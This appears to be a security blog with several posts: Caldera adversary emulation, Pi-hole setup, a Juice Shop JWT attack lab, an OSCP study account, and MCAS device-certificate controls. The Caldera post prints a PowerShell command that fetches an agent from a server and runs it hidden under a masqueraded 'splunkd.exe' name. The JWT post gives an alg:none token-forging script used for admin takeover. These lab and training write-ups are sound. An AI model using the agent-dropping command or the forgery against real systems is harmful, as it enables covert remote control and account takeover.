MITRE Caldera – Emulating an Adversary

Perishable threat intelligence – when a new attacker enters the fray or when an existing threat actor changes their tactics, the various security firms inevitably publish threat intel on these attacks. IOCs expire quickly, growing stale faster than the box of cereal your kids raided and failed to reseal. This does not, however, mean that threat intel should be completely ignored. In fact, it provides value in a few different spaces. In this blog post, I am going to focus on how to use threat intel with MITRE Caldera in order to mimic an adversary. You may want to do this for a few different purposes. The first might be a product evaluation: can endpoint security tool X protect, detect, and help you respond to these attacks? The second is training your SOC and responders: what does the telemetry look like? Do we have all the detections in place necessary to see the various components across the kill chain in these specific attacks? By leveraging threat intel in these ways, you can know whether you are able to handle these categories of attacks regardless of how attackers morph them. Since defenders are almost always a step or more behind, it is important to utilize threat intel to help ensure you have the tooling and expertise you need across entire categories within the kill chain.

MITRE Caldera: https://github.com/mitre/caldera

Documentation: https://caldera.readthedocs.io/en/latest/

I HIGHLY recommend running through the content within the Training plugin once you have the product installed. It will give you a solid base of understanding of the product. If you complete the training, you even have the opportunity to turn in a flag to MITRE, and they will send you a certificate of completion.


Step 1: Installing the Red Agent

I am going to be using a Windows 10 machine. In order to really see what an adversary would be able to do on the endpoint, I am going to disable all of the Defender-oriented protections on the VM, including real-time protection as well as the mitigating controls contained within Attack Surface Reduction (ASR), such as Controlled Folder Access, Exploit Guard, Network Protection, etc. There is a whole host of capabilities built right into Windows 10 that stop most attackers dead in their tracks if the protections are enabled and configured correctly. Windows 10 really is a secure operating system if the full Defender stack is enabled.

Next, I am going to deploy the Sandcat agent (54ndc47) to the machine. Since I do not have a user to phish or anything like that, I just go ahead and deploy the agent by hand to get communication rolling. Caldera does a great job of giving you a PowerShell command customized to your environment if you just fill in the IP of your Caldera machine.
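The generated command looks something like the following. This is a sketch from a lab deployment, so the server IP will differ in your environment; the splunkd.exe name is the masquerade file name Caldera uses by default:

  # Download the sandcat agent from the Caldera server and launch it
  $server="http://192.168.1.100:8888";
  $url="$server/file/download";
  $wc=New-Object System.Net.WebClient;
  $wc.Headers.add("platform","windows");   # request the Windows build
  $wc.Headers.add("file","sandcat.go");    # request the sandcat agent
  $data=$wc.DownloadData($url);
  [io.file]::WriteAllBytes("C:\Users\Public\splunkd.exe",$data) | Out-Null;
  Start-Process -FilePath C:\Users\Public\splunkd.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;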

All I have to do is bring the command over to my victim machine, run it, and I will have the ability to attack. Notice, however, the last line of the PowerShell command will actually run the agent in a hidden window. I like to see what is going on so I am going to run the command a little differently so that I can see what is happening with the agent. There are different command line options that can give you verbose output.
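Something along these lines works (a sketch; the -v switch asks the sandcat agent for verbose output, and invoking the binary directly keeps it in the foreground instead of a hidden window):

  C:\Users\Public\splunkd.exe -server http://192.168.1.100:8888 -group red -v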

As you can see here, I am running the agent in a way that displays verbose output. This will let me know when activities hit the agent which is nice for the purposes of demoing and troubleshooting.

Above is the display of the new agent reporting into the red console within Caldera. Notice that I am running the agent as elevated. I would hope that any kind of phishing would land an attacker within a customer’s environment in the user space and not directly in admin; however, basic mitigations such as removing local admin and deploying tooling such as LAPS are still unfortunately not the norm. If at all possible, implement as many of the mitigations from the Securing Privileged Access roadmap located here: https://aka.ms/sparoadmap. Basic account segmentation, credential hygiene, and the built-in security controls available within most modern operating systems are enough to stymie a significant portion of attackers, save the most determined adversaries conducting a targeted attack. Now that we have an agent reporting into Caldera, let us look at constructing a basic adversary.

Step 2: Constructing an Adversary

Within the Caldera Red dashboard, Navigate -> Adversaries. Hit the slider so that it moves from VIEW to ADD

Top center, it is kind of grayed out, but find the spot that says “enter a profile name” and do so.

Becomes

On the far right, we have the option to link an objective, add an adversary, and/or add an ability. For this demo, we are going to focus on MITRE tactics, techniques, and procedures (TTPs), so we are going to add an ability.

This brings up a new screen that allows us to browse to the TTPs we want to add to our adversary. The first dropdown list displays a list of the different tactics aligned to the MITRE framework.

I am going to go with discovery. Once I select discovery, techniques that once again align to the MITRE framework are populated in the next dropdown.

I am going to select T1082 – System Information Discovery. This lights up 12 associated abilities. These are basic endpoint enumeration capabilities that let you snag the version of the OS and other basic system information from the endpoint. I am going to add a few of these to my adversary. When I select one of these, I can view the code and the associated information for each of the supported platforms. This is really nice as it shows how these abilities are constructed, which can lend itself nicely to constructing your own custom TTPs down the road.

Down at the very bottom, hit Add to Adversary. Now, the new adversary looks like this:

I am going to add a few more for discovering additional system information. NOTE – since I am going after a Windows machine, I need to make sure whatever ability I select actually has Windows as an option, or I would need to potentially add my own code. For example, if I select List OS Information, I can look at the bottom and see that there is code for Darwin (Mac) and Linux – but there is no Windows! I am thinking I could easily create a new ability and add an executor for this that would run the systeminfo command on the endpoint.

  • Reset button to clear all options
  • Generate new id (sets the GUID)
  • Name = Custom – List OS Information
  • Description = Identify System Info
  • Tactic = discovery
  • Technique ID = T1082
  • Technique = System Information Discovery
  • Add executor
  • Platform = Windows
  • Executor = psh
  • Command = systeminfo
  • Timeout = 60

Leave the rest. Save and then add it to our adversary.
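Under the hood, Caldera stores abilities as YAML, so the ability we just built should look roughly like this (a sketch; the id below is a placeholder for the GUID generated above):

  - id: 00000000-0000-0000-0000-000000000000
    name: Custom - List OS Information
    description: Identify System Info
    tactic: discovery
    technique:
      attack_id: T1082
      name: System Information Discovery
    platforms:
      windows:
        psh:
          command: systeminfo
          timeout: 60

Seeing the YAML makes it easy to build further custom abilities in bulk rather than one at a time in the UI.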

Notice that this activity actually now covers all 3 platforms

At this point, you can add as many techniques aligned to your threat intel as you like into your new custom adversary. I am not going to add any more for demo purposes; instead, I am going to go ahead and save my adversary.

Now, I can run an operation against my agent that I had previously deployed. Let us see if I get results!

Step 3: Run an Operation

Navigate -> Operations. Change the view to ADD.

  • Name = Customer Adversary Test Operation
  • Group = red (in my environment there is only 1 group and the agent is assigned to this group)
  • Adversary = Blog Post Demo Adversary

Leave the rest and hit start. This should attack my agent with basic recon TTPs. After I hit start, I have to wait for the agent to beacon, but then I see the agent starting to run the activities I have associated with the operation.

Troubleshooting – if your activities do not run (or they just are not displayed), you can download the report, and it will potentially tell you which TTPs were not executed and even potentially why. For example, on the first pass with this blog post I set the executor for the custom activity to cmd, and it failed to load and run. I did not dig into the details (I suspect it required the command line param format for the executor), but I switched it to psh and now it runs just fine.

And I can view the details by clicking the star icon to the right

Cool stuff! With this, I can take perishable threat intel and use the Caldera tool to simulate the types of activities these actors are executing in the wild. This approach lets me test my tooling to ensure I have visibility, and potentially protection and control, in these spaces within my environment. I can train my SOC to look for these TTPs and the activities associated with various threat actors and campaigns. This can be very powerful if used in the right way.

MITRE, OffSec, Security

Pi-hole – Life Changer? Maybe…

The Internet seems to run on advertising – and that is fair. Companies and individuals need to find a way to monetize their products and data without hiding everything behind paywalls. With that being said, there are plenty of sites and services with ill intent when it comes to harvesting data, counting clicks, analyzing and attributing browsing habits, etc. As a consumer, a daily user of the Internet, and one who actually relies on the Internet for my livelihood, I feel it is very important to protect myself and my family’s online activities.

Enter Pi-hole

https://pi-hole.net/

What is Pi-hole? It is an application that runs on Linux (which could be running on a Raspberry Pi) that acts as a DNS sinkhole. When traffic from your network is looking to route to an unwanted domain on the Interwebs, Pi-hole simply refuses to respond with an IP address for the destination. This is a pretty slick way to head off adware and other dynamic content that gets rendered in a lot of sites. For me, I absolutely despise it when I browse to a site, start reading, and then the whole page rearranges/shifts because an ad pops in.

I was surprised at how easy this was to set up. First, a key point: Pi-hole does NOT require that you purchase a(nother) Raspberry Pi – it can run in a few different ways. First, it can run as a Docker container (awesome), or you can simply install it on the various operating systems that are supported. I have a beefy (if old) Hyper-V server running in my basement, so, for my purposes, I chose Ubuntu 18.04 – mostly because I already have a VM image created. I fired up a new copy of the image, ran sudo apt update && sudo apt upgrade, and away we go.

Install

https://github.com/pi-hole/pi-hole/#one-step-automated-install

I read through the install and chose to install this with the One-Step Automated Install. It is a VM – if something goes wrong, I can revert to a new image since nothing else is happening on this machine anyway. The One-Step install went almost perfectly. It was fast, and I only hit one minor snag post-install – DNS resolution on the machine was pointed to 127.0.0.53 in the /etc/resolv.conf file. I changed the file so that DNS is now resolved via my router (forwarded to the ISP).
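For reference, the install really is a single command (from the repo linked above), and the post-install fix was pointing resolv.conf at the router. The 192.168.1.1 address below is a placeholder for your router’s IP:

  curl -sSL https://install.pi-hole.net | bash
  sudo sed -i 's/nameserver 127.0.0.53/nameserver 192.168.1.1/' /etc/resolv.conf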

The next step was to set the Pi-hole admin password. From my reading, it sounds like I might have missed a password getting set during the install and being displayed on the screen. No biggie, the password can be set by a machine admin:
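  pihole -a -p

(That is the stock Pi-hole admin command; it prompts for the new web interface password.)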

The last step to configure Pi-hole was to update Gravity. I am not 100% sure this is a required step to get Pi-hole working initially; however, things started working almost instantly (and awesomely) immediately after I ran the update. Basically, Gravity takes all your block lists and consolidates them, and that consolidated list is then used to sink unwanted requests:
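  pihole -g

(Gravity can be re-run at any time with that one command; it pulls down and consolidates the configured block lists.)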

The only thing left to do at this point is to change the DNS settings in my environment so that my machines all start using the Pi-hole for DNS. For me, this actually meant temporarily cutting over to the built-in DHCP server that Pi-hole provides for the purposes of this blog post.

Note – disable any other DHCP services running on the network.

24 hours later

Wow, what a difference.

Sites that are riddled with ads and out of control JS that cause me to want to hulk smash the keyboard because the content moves after I have started reading…are no longer misbehaving. Games on my cell phone…playable! What a massive improvement in the user experience. And I now have the ability to pull in additional lists or purposefully block sites and services in my environment by simply adding them to the list. I already love it, and this is going to be a very handy tool to have for testing purposes.

Automation, Security, Web Attacks

Practicing JWT Attacks Against Juice-Shop

I love attending the sessions put on by Black Hills Information Security when I can. Last week, the session was on JWT token attacks, which I found very interesting. I wanted to see if I could mimic part of the demonstrated attack, reproduce it, and then leverage that attack into elevated access on a site. The BHIS session on JWT attacks from 6/18/2020 can be found here: https://www.youtube.com/watch?v=muYmiEtPL8U&t=2490s

For this lab, I downloaded Juice Shop which is intentionally vulnerable to many of the top OWASP attacks. Once I had the app up and running, I explored the app some to enumerate users. In the session we didn’t get to see where the admin user was exposed – turns out this was super easy to find. After poking around in the site I decided to try and attack a password change for the admin account to see if I could muster a complete account takeover.

Step 1: Install Juice-Shop

I already had an Ubuntu 18.04 LTS machine running in the lab, so I just wanted to add the app here. I tried the NodeJS and NPM route first, but I ran into some snags and I did not want to invest a ton of time troubleshooting. I decided to go the Docker route and I was able to get this working on the first try.

Juice-Shop: https://github.com/bkimminich/juice-shop#docker-container

Docker installation directions: https://docs.docker.com/engine/install/ubuntu/

I followed the documented steps verbatim:
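  docker pull bkimminich/juice-shop
  docker run -d -p 3000:3000 bkimminich/juice-shop

(Those two commands are straight from the Juice-Shop README linked above; the app then listens on port 3000.)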

And I was able to browse the site:


Step 2: Recon

There is a ton to explore on this site. For the purposes of this post, the only necessary recon is to open the Apple Juice product, look at the product review and note the username of the person that left the review:


admin@juice-sh.op seems like a “juicy” target (pun intended).

Ok, now onto trying to exploit a JWT token vulnerability…

Step 3: Identify Where/What to Attack

    1. I need an account. If I have an account, I can look at how the JWT tokens are constructed, and then I can use that to try to craft a new token as my victim user. I went to the login page and created a new account named hack@hack.com w/ a password of P@ssw0rd!

    2. I then logged in with the newly created credentials:

    3. I took a look at all of the traffic in the Burp proxy log and noticed calls to the /rest/user/whoami endpoint with my JWT token:

    4. The tokens are the same in the Authorization header as well as in the cookie. I chose the bottom /rest/user/whoami GET and used Send to Repeater
    5. Now I need to determine whether to attack the Authorization Bearer token, the token in the cookie, or both
      1. I added a letter to the auth header (basically breaking it) – no change on send
      2. I added a letter to the cookie and it breaks – this is the one that matters

Before:

After:

Step 4: Craft the JWT Attack Token

  1. This is a signed JWT token – I can tell because it is <base64url-header>.<base64url-payload>.<base64url-signature> – 3 base64url-encoded strings separated by periods:

  2. I copied the header into Decoder, decoded it as Base64, changed “RS256” to “None”, and then encoded as base64. The new string is my new header. I pasted this into a document off to the side for later use

     

    ** NOTE – the “=” sign will break the header. These need to be dropped when copying and pasting!

  3. Next, I grabbed the payload and dropped that into Decoder, modified the email address, and then re-encoded it as base64:

    And changed it to this, then encoded it as base64

  4. I copied the new payload and then pasted the new header and payload into Repeater. I dropped the signature (since we now have “none” in the header) and hit send:

    No luck – this is where I had to play with the headers a bit to get this to work consistently. In order to get the return I wanted, I ended up removing headers until I got the result.

    Modified request (missing some headers – most notably the bearer token):

    Result:

Success! With that, I doubt that the id of the admin user is 18 (this is the id for the hack@hack.com account I created). Most likely, admin is going to have an id of 1, so I changed that in the token, re-encoded, and resent. Result:
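Before moving on, the whole forgery can be scripted rather than hand-assembled in Decoder. A minimal bash sketch, assuming the payload fields match what the decoded Juice-Shop token showed (the id and email are the values I swapped in):

  # base64url-encode without padding; the trailing '=' breaks the header
  b64url() { printf '%s' "$1" | base64 -w0 | tr '+/' '-_' | tr -d '='; }

  header=$(b64url '{"typ":"JWT","alg":"none"}')
  payload=$(b64url '{"status":"success","data":{"id":1,"email":"admin@juice-sh.op"}}')

  # alg none means an empty signature, hence the trailing dot
  echo "${header}.${payload}."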

Step 5: JWT Attack

  1. I now have a JWT token that is accepted by the /rest/user/whoami API. With that, I need to see if other parts of the application will accept the token, and I chose to attack the password change functionality. I went into password reset on my account to change the password:

    And changed the password to “password1”:

  2. Looking at this traffic in Burp:

  3. I simply replaced the Authorization token with the newly crafted JWT and replaced the entire cookie in this new request from the previous Repeater request:

    I get a 200 back, and the password is shown within the returned payload. Turns out this is the MD5 hash of the password I did in fact just set. Now, can I log in with the creds?

  4. Success!

I was able to change the password for the admin@juice-sh.op account and log into the app with the new credentials!

Key takeaways:

  1. Base64url encoding for the headers
    1. Drop the trailing “=” or the header will break
  2. Play with the headers until you get a result you like

Good stuff!

Security, Web Attacks

OSCP – My Beginning, My Fall, My Rise and My Resources – Just Like Batman

I officially got notice today (5/26/2020) that I passed my OSCP exam. I am going to keep this light with a focus on study resources, as there are many better writeups on how to tackle the OSCP. It took me about a year and two test attempts, but I finally made it. This was the hardest singular exam I have ever taken, as the breadth of knowledge required and my starting point made this quite a significant task. My boss provided the funds for me to purchase the course materials last summer (2019 – thanks Tavis!) and I studied/focused on the book material right out the gate…huge mistake. I let my lab time expire and barely touched it. At the time of expiration, I had popped a single low privilege shell using SQLMap (not even allowed on the test) and had 0 additional success prior to lab expiration. I knew I was nowhere near ready, so I turned to forums and found folks were prepping by working with machines from Vulnhub and Hack The Box. Prior to my first attempt at the test (Feb 2020) I did purchase 15 days of lab time to see what I could do, and I had quite a bit of success. I attempted and failed the test in Feb 2020 due to time management – shocker! This is a common reason folks post for failing, and I now wholly understand why. In April of 2020 I attempted a second time with a different strategy and came out on top!

Resources

I took a lot of guidance from this post: https://forum.hackthebox.eu/discussion/1730/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt

Here were the materials I really used to prep for the exam

    1. Read the book
    2. Attacked the lab (especially with the second block of time)
    3. Watched the videos – sort of
      1. Probably could have gotten more value here
    4. Hack The Box
      1. As many of the solved easy-medium ones as I could
      2. Requires the VIP subscription but this is like $120/year
    5. VulnHub – OSCP-Like
      1. https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms
    6. Buffer Overflow Practice
      1. https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
    7. IPPSec videos
      1. Watched all CTF Windows Easy
      2. Watched most CTF Windows Medium
    8. Rana Khalil’s writeups
      1. These are amazing!!!

My Study Strategy

I really took to heart the blog post from LRNZO above and followed the guidance. For some reason, it really resonated with me on reading, so I settled on that for my strategy. I dove in and heftily focused on OSCP-like machines across HTB and VulnHub. I spent very little time using or learning Metasploit – just the basic commands needed to attempt an exploit or to use the multi-handler. My intention was to conquer all of the machines without Metasploit, or at least attempt them without having to use it. In retrospect, I think I should have spent a little more time here and learned the tooling better, as I do think one of the test machines I ran into was potentially meant to be cracked with MS, and I did not end up getting that one. I really got the most value from the retired HTB machines and the writeups. I would attempt these machines myself and then read the writeups afterward to see if there were things I could have done differently. It is always pretty humbling to see how badly you struggle doing something and then watch something like an IPPSec video on it where he shows you 3-4 different ways to accomplish the same thing. The best/craziest part about learning all of this really comes down to the Einstein quote – “The more I learn, the more I realize how much I don’t know”…so very true. This is where Rana Khalil’s writeups were awesome as well – I loved her approach to recon and how concise her writeups were.

Key element for sure – focus on the basics and recon, recon and then recon some more. Enumerate. Find the nooks and crannies until something presents itself. I cannot tell you how many machines I have solved now when I have given up all hope (almost) and then tried just one more thing…and then the lid blows off. This even happened during the test. I am coming to find that mindset is key and mental endurance (especially during the test) is a necessity.

Time Management

Test Take #1: Wow, did I fail on this the first time around. I read a lot of blog posts on how to tackle the test. I decided to go with the early morning start – get the test rolling as I would my normal work day, hit the BOF right out the gate, plan to have 60-65 pts by dinner, take a break to hang with the family, crack the rest of the machines by midnight, and get a good night’s sleep with a score of 100 – heh, that didn’t happen. Rather, I hit a snag with the BOF, spent 2-3 extra hours flummoxed there (something silly), started reconning the other machines late, ended up in a mental tailspin, and completely defeated myself by late evening. I think I may still have only had the BOF (25 pts) at midnight, and that was largely due to my approach, my frustration, and my deviation from the game plan. I kept looking for the quick easy win rather than working the recon and making sure I was not missing something. I had a printed-out playbook on what to do and how to recon based on service enumeration, which went completely out the window as I sought homerun after homerun. You have to go into the test with a game plan and STICK TO IT. In the wee hours of the morning, I was exhausted and mentally defeated. If I had submitted the report, I think I would have been at around 55 pts when the clock ran out.

Test Take #2: The approach on this attempt was way different. First, a lot of the blog posts suggest doing the BOF right out the gate and getting it out of the way – I say nay to that. Rather, make sure you are as comfortable with them as you can be and do the BOF when your brain is fried. That is why you practice anything – so you develop the muscle memory and can execute it in your sleep. I took the opposite approach as to when to start this time as well – rather than starting with my normal day and then spending my exhausted time in front of the keyboard when it was dark outside and I would normally be asleep, I started my test at 6PM so that I would spend my truly exhausted time during the day when the sun was out and I would normally be working. 6AM came around the next morning, I was still chugging, I put on a pot of coffee, and I pulled a true all-nighter, never actually having my head hit the pillow during the test. I only ended up with 70 pts (I was oh so close on another machine right as the clock ticked off), but the point is that I was actually still going strong(ish) at the end.

For this, you have to do what you think will be right for you, however, for me it came down to figuring out how I was going to be able to stay positive enough to defeat Debbie Downer when she came knocking. Fatigue is a mighty foe and not to be trifled with.

Advice

I’ve been hit up a few times now by folks looking to start their OSCP/Pentesting/Cybersecurity journey asking me how to get started. I would say that the OSCP is maybe not where to start your cybersecurity trek; however, if you are looking specifically to get started with pentesting and learning this tooling, then the most important thing to understand is that it is totally OK to fail…but not too fast. You need to feel the pain. Don’t hit the walkthroughs, blogs, or forums too fast when working a machine, but don’t wait forever either. Make sure you are truly stuck and then go and get the answer you need to move onto the next step. The whole “Try Harder” crud is garbage (IMO) – smashing your face into the same wall over and over does not teach you anything. Do your best to make sure you are truly at a dead stop and then go get the answer you need to move to the next step. Make sure you understand what it took to overcome that block and tuck it away in your utility belt for next time (aka learning) – this is especially true early on. If you could already solve all of these machines and you had infinite time, then “Try Harder” might apply; however, thinking back to math in HS and college, there was a reason the odd numbered questions had their answers in the back of the book….

Additional Resources

These are ones I just want to call out as coming in very handy in prep for the test. There is so much to learn and so many resources out there that provide invaluable insight and capabilities it would prove impossible to list them all. The most important resource is most likely your favorite search engine.

Pentestmonkey Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Nishang: https://github.com/samratashok/nishang

Crackstation: https://crackstation.net/

GTFOBins: https://gtfobins.github.io/

Footnote

I do have to add a special footnote here and say thanks to my wife. She watched the kids while I studied and had to tackle them fully on her own the full day of the test. With a 3 and 7-year-old at home, no small feat and this was in the midst of shelter at home. Thanks Erin!

OffSec, OSCP, Security

MCAS – Device Identity via Certificates and Progressive Web Apps

I have a customer scenario where we needed to explore leveraging certificates in order to identify corporate Windows 10 machines for the purposes of preventing corporate data from being downloaded from O365 services to non-corporate assets. There are a few different ways this can be tackled; however, other routes proved to be dead ends for various technical reasons, so we landed on leveraging device certificates via MCAS in order to control data spillage.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#managed-device-identification

Utilizing device identity via MCAS with certificates does mean that your user traffic for the devices with certs (and without) will have to go through Conditional Access App Control for all sessions (reverse proxy). It took some trial and error to get this to work. I do want to point out that this method is technically not supported for O365 services, as proxying traffic for O365 can impact the user experience and the SLAs.

Scenario

  1. Hybrid Azure AD Joined machines will be allowed to access corporate resources unfettered
  2. Corporate devices without HAADJ will have a certificate deployed to them. The certificate will be used in a session control policy via MCAS to allow the device to download corporate data from O365
  3. Devices without certificates (corporate or otherwise) will be treated as untrusted. They will still be allowed to access corporate data (as allowed by other conditional access policies outside of the scope of this blog) but they will not be allowed to download data from O365

Hybrid Azure AD Join: https://docs.microsoft.com/en-us/azure/active-directory/devices/hybrid-azuread-join-managed-domains

HAADJ is a function of AAD and AAD Connect where machines are effectively synced from your on-prem AD into AAD. If a device has been synced, that information can be leveraged within conditional access policies as a piece of criteria during authentication. At this point, you can decide to request additional controls (such as MFA), whether to allow or block access, and even potentially drop the session into the MCAS reverse proxy for additional session control. In order to cover these scenarios for my lab, I configured two conditional access policies – the first policy enables the scenario I want to allow and the second policy blocks the rest.

Policy #1 – ITOp5 – RP – Block Download without Cert

My target user is ITOp5 in my lab. This is a standard user account that has been synced from the on-prem AD via AADC.

Apps – I went lazy for this and simply selected all apps

Conditions

Only targeting Windows since this was my client’s use case

Only allowing browser – the reverse proxy only works with the browser. Since that is the case, we are only going to allow browser-based access.

For device state, we want to include all devices…

But exclude devices that are actually compliant (this is a 2-fer and how we catch all 3 scenarios with 2 conditional access policies)

In this case, I am only granting access, but additional controls and requirements could be implemented

Lastly, I am putting my user into Conditional Access App Control, aka the reverse proxy, if the above criteria are met

Policy #2 – ITOp5 – Block Non Browser on Non Compliant Devices

This policy is almost exactly the same with two exceptions. The first exception is Client apps – in the allow policy this is set to Browser. In the block, this is set to everything else

Lastly, rather than grant the policy is set to block

With these CAPs, folks coming in on a Windows machine either need to be marked compliant via Intune or have their devices HAADJ in order to have full access to all resources and to be able to use thick client apps. Everyone else is going to be routed into the reverse proxy. For the proxied users, if they have a certificate, they will be allowed to download data to their endpoint. If they do not have the certificate, the user will be forced to leverage the cloud-based tools within O365 to collaborate and work with corporate data.

MCAS – Session Control Policy

Configuration here is straightforward. It is a Control file download (with DLP) policy. For the criteria, it is going to specifically target my test user and block if the user does not have the certificate. Given that, the criteria are targeted to the devices that do not have a valid certificate

For the file criteria I could get specific and try to stop content specifically with PII, financial data, HIPAA, etc. but I really want to stop all egress in order to prevent non corporate devices from coming under potential eDiscovery. With that, the criteria for what I am looking for is left blank to catch all content

Lastly, the policy is set to block with a custom block message. Notifications are optional

This is it! Other than getting certificates to the endpoints, the configuration is complete. A HAADJ machine should be allowed to connect regardless of app. An unmanaged device should be routed into the reverse proxy, and data egress should be blocked.

I verified in the lab that this configuration gives me the behavior I want.

Device Certificate

For the root cert that goes into MCAS, it just needs to be the base64-encoded public cert (.CER) file that you import. Simply export, import, and done.

https://docs.microsoft.com/en-us/cloud-app-security/proxy-intro-aad#client-certificate-authenticated-devices

The device identification mechanism can request authentication from relevant devices using client certificates. You can either use existing client certificates already deployed in your organization or roll out new client certificates to managed devices. You then use the presence of those certificates to set access and session policies.

Not a ton of detail – this suggests that a device certificate on the endpoint should be sufficient. There is a little more detail further in the article that suggests an SSL certificate. From my testing, I have found that the ultimate requirement for this certificate itself is that it has Client Authentication in the Extended Key Usage. Lastly, the certificate needs to be installed into the user’s personal store – the local machine store will not work.

Walking through the process using a MS PKI to deploy the cert – this is probably not the most efficient method and is definitely not the route you would go to deploy certificates in bulk to end users. This is purely the process I used, and I wanted to document it here to show how I got a cert manually into the end user store.

Certificate Authority Template

I duplicated the Web Server template and added Server and Client Authentication into the Extended Key Usage. I then published the template for use within the CA.

End User Certificate Request

I am doing this manually with a certificate signing request. On the endpoint, create a request.ini with the following and run the certreq command
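Something like this works as the request.ini (a sketch; the subject and key options are lab assumptions, MachineKeySet = FALSE keeps the key in the user context rather than the machine store, and the EKU OID is Client Authentication):

  ; request.ini
  [Version]
  Signature = "$Windows NT$"

  [NewRequest]
  Subject = "CN=mcas-device-cert"
  KeySpec = 1
  KeyLength = 2048
  Exportable = TRUE
  MachineKeySet = FALSE
  RequestType = PKCS10

  [EnhancedKeyUsageExtension]
  OID = 1.3.6.1.5.5.7.3.2 ; Client Authentication

Then generate the CSR:

  certreq -new request.ini csr6.req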

I took the output in the csr6.req file and pasted it into the CertSrv site requesting a certificate utilizing the custom Web Server template I created with Client and Server authentication in the EKU

I downloaded the .cer file, copied it to the target workstation, and then ran the following to import the cert directly into the user’s personal store
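  certreq -accept certnew.cer

(certnew.cer here is the default file name CertSrv hands back; adjust to whatever you saved. Because the key pair was generated by certreq in the user context, accepting the issued cert lands it in the user’s personal store.)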

At this point, we can validate that the browser is able to see the certificate by going into Settings -> Search for Certificates

I can also see the certificate if I go into the certificate manager and look in the user’s personal store

Now, when I browse to O365, I hit the login page, provide my username, and then my password. Immediately post-password, I get the following

I select my certificate and hit OK. This allows me into O365. At this point, I can browse anywhere in the cloud service and download files, since I now have a valid certificate that I presented immediately post-authentication to the reverse proxy. Given how the conditional access policies are configured, this prevents all non-browser apps from accessing the services. This means that only machines that are HAADJ or Intune managed (and compliant) are allowed to use thick client applications. Machines outside of that are allowed to access O365 but are not allowed to download content unless they have the certificate. Even the machines with the certificate are forced into using the web apps for O365, as applications like Outlook, Teams, OneDrive sync, etc. are not allowed to connect directly to the service. These users with the cert would be able to download content directly to their machine and work on it offline, but they would then have to re-upload the content via the browser when it came time.

Progressive Web Apps

PWAs introduce an interesting option for enabling productivity while still flowing the traffic through the reverse proxy and controlling data egress. This is very slick, and I use PWAs for sites/apps both for O365 and otherwise.

https://docs.microsoft.com/en-us/microsoft-edge/progressive-web-apps-edgehtml/get-started

That’s the dev resource for PWAs, so what does this actually mean for O365? You can pin specific sites (like Outlook and Teams) as PWAs on a machine. They are still web apps, but they get better performance, they get extra caching, and they get all the nice little tweaks that make them _almost_ as good as the thick client. Keep in mind, the _almost_ is my opinion, and it does depend on the app. For example, I use a music streaming service on my home machine. The app for the streaming service is a resource hog. I pin the PWA for that app, and it is significantly lighter on resources. I think each web app (both in and out of the MS ecosystem) warrants exploring.

Edge Chromium

Summary

Requirements for leveraging Device Certificate via MCAS to block downloads of corporate data to unmanaged devices

Device Certificate Requirement

  • Certificate has Client Authentication in the Extended Key Usage
  • Certificate is located in the user’s personal store

Conditional Access

  • Non-browser apps are blocked for the targeted users – required, or the session will not be routed into the reverse proxy, which negates the usage of the certificate to allow/block downloads
  • Browser access is set to be granted through Conditional Access App Control

MCAS Session Control Policy

  • Block downloads of all data to devices that are not tagged with having the certificate

Resultant Scenario

  • All users off network and/or in scope would be forced to use web-based clients for a connected experience. This means thick client apps such as Outlook, OneDrive Sync, Teams and even tools like Excel and Word will not work when connecting directly to cloud data
  • All users with a valid certificate would be able to download the data and work with tools like Word and Excel in an offline mode and then reupload the data into SharePoint or OneDrive
  • Progressive Web Apps provide a nice alternative to thick clients, though they do not allow local disk access
  • End users would still have full access and be able to use the web-based collaboration tools within the cloud without allowing egress of data to their endpoints

Happy MCAS-ing!

Hack Job, MCAS